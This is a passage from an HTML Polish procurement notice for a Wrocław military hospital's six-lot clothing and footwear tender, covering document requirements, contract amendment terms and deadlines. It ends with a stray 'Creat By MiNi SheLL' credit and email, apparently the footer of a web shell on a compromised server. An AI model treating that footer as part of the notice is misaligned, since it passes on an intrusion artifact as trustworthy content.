c)	Do oferty prosimy dołączyć dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego (w formie prospektów, katalogów w języku polskim) oraz określający technologię prania, czyszczenia i konserwacji oferowanych wyrobów z uwzględnieniem wymagań określonych przez Zamawiającego W przypadku braku powyższych dokumentów oferta zostanie odrzucona jako nie spełniająca wymogów Zamawiającego (z zastrzeżeniem art. 26 ust. 3 PZP). Jednocześnie należy w Załączniku nr 2 do SIWZ podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć (np zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru
6. Pakiet 6 - Dostawa umundurowania i obuwia służbowego portierów:
a)	Oświadczenie Wykonawcy, że zaoferowane w ofercie wyroby zostaną wykonane zgodnie z obowiązującymi u Zamawiającego wzorami umundurowania pod rygorem odstąpienia od umowy  (wg. wzoru stanowiącego załącznik nr 11 do SIWZ) 

Dokumenty wymienione w niniejszym Rozdziale należy ułożyć chronologicznie, poszczególnymi zadaniami, narastająco produktami oraz opisać dodatkowo, której pozycji dotyczą.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>POZOSTAŁYCH DOKUMENTÓW:

1.	W przypadku osób fizycznych zaleca się złożenie aktualnego wpisu do ewidencji gospodarczej w celu potwierdzenia umocowania do złożenia oświadczenia woli w imieniu Wykonawcy. W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zaleca się złożenie aktualnego dokumentu pozwalającego stwierdzić umocowanie do składania oświadczeń woli. Zamawiający zastrzega, że w przypadku wyboru oferty będzie żądał dostarczenia wyżej wymienionych dokumentów przed podpisaniem umowy.
2.	Pełnomocnictwo w przypadku, gdy umocowanie do złożenia oświadczenia woli w imieniu Wykonawcy nie wynika z dokumentów wymienionych Rozdz. IV pkt 1 ppkt1 lit.b i Rozdz. IV pkt 3 ppkt 1.
3.	Wzór umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przedmiotowo istotne elementy umowy (essentialia negotii) związane ze sposobem realizacji zamówienia, warunkami umowy zawiera Załącznik 3, w którym należy wypełnić wszystkie miejsca wykropkowane z wyjątkiem numeru umowy, daty jej zawarcia i złożyć wraz z ofertą (pod rygorem odrzucenia oferty). Umowę będzie uznawało się za zawartą w dacie wymienionej we wstępie umowy.
Oprócz przesłanek wymienionych w  art. 144 ust. 1 PZP Zamawiający przewiduje następujący zakres zmian w umowie, które będą mogły być wprowadzone w formie aneksu:
1.	Wszystkie wartości netto określone przez Wykonawcę są ustalone na okres ważności umowy i nie wzrosną. Zamawiający dopuszcza zmianę umowy w formie aneksu w przypadku, gdy wartości netto przedmiotu umowy obniżą się, przy czym konsekwencje rachunkowe stosuje się odpowiednio.
2.	Urzędowa zmiana stawek podatku VAT obowiązuje z mocy prawa. Zamawiający dopuszcza zmianę zapisów umowy w formie aneksu w przypadku zmiany stawki podatku VAT. Wynagrodzenie nie podlega waloryzacji. Strony ustalają, że Zamawiający będzie zobowiązany do zapłaty Wykonawcy wynagrodzenia w jego nominalnej wysokości, uwzględniającej kwotę podatku VAT obliczoną według stawki obowiązującej w chwili składania ofert, wobec czego podwyższenie stawki podatku VAT lub podwyższenie cen urzędowych spowoduje zmniejszenie wynagrodzenia netto Wykonawcy w stosunku do wynagrodzenia netto określonego w ofercie Wykonawcy, przy zachowaniu cen brutto, na co Wykonawca wyraża zgodę. W takim przypadku zmniejszenie jednostkowych wartości netto nastąpi z chwilą wejścia w życie odpowiedniego aktu prawnego, a Wykonawca prześle aktualny formularz cenowy. Wartość netto przedmiotu umowy, jak również wartości jednostkowe netto nie mogą zostać zwiększone w trakcie trwania umowy, wobec czego obniżenie stawki podatku VAT skutkuje obniżeniem ceny brutto umowy. W takim przypadku zmniejszenie jednostkowych cen brutto nastąpi z chwilą wejścia w życie odpowiedniego aktu prawnego.
3.	Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zmiany będą konieczne i korzystne dla Zamawiającego. Za zmiany korzystne należy uznać wszelkiego rodzaju nowe postanowienia, które wzmacniają pozycję zamawiającego jako wierzyciela z tytułu świadczenia niepieniężnego (np. wydłużenie okresu rękojmi, skrócenie terminu wykonania zamówienia, obniżenie ceny, podwyższenie kar umownych), oraz te zmiany, które prowadzą do wzmocnienia jego pozycji jako dłużnika z tytułu świadczenia pieniężnego (np. wydłużenie terminu zapłaty, obniżenie odsetek za zwłokę, obniżenie wskaźników waloryzacyjnych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.4wsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Płatność na podstawie wystawionej faktury lub 
nieodpłatnie pobrać ze strony internetowej: www.4wsk.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 10:00, miejsce: 4 Wojskowy Szpital Kliniczny z Polikliniką SP Z.O.Z. we Wrocławiu, ul. Weigla 5 - budynek Administracji Ogólnej, pok. nr 18 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży dla personelu medycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży chirurgicznej barierowej i zabiegowej bawełnianej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży dla personelu pojazdów sanitarnych R i W.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.20.00.00-1, 18.81.33.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa obuwia dla personelu medycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.23.00-7, 18.81.33.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odzieży i obuwia roboczego (ochronnego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.30.00-6, 18.23.54.00-9, 18.33.20.00-5, 18.20.00.00-1, 18.81.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa umundurowania i obuwia służbowego portierów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.83.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com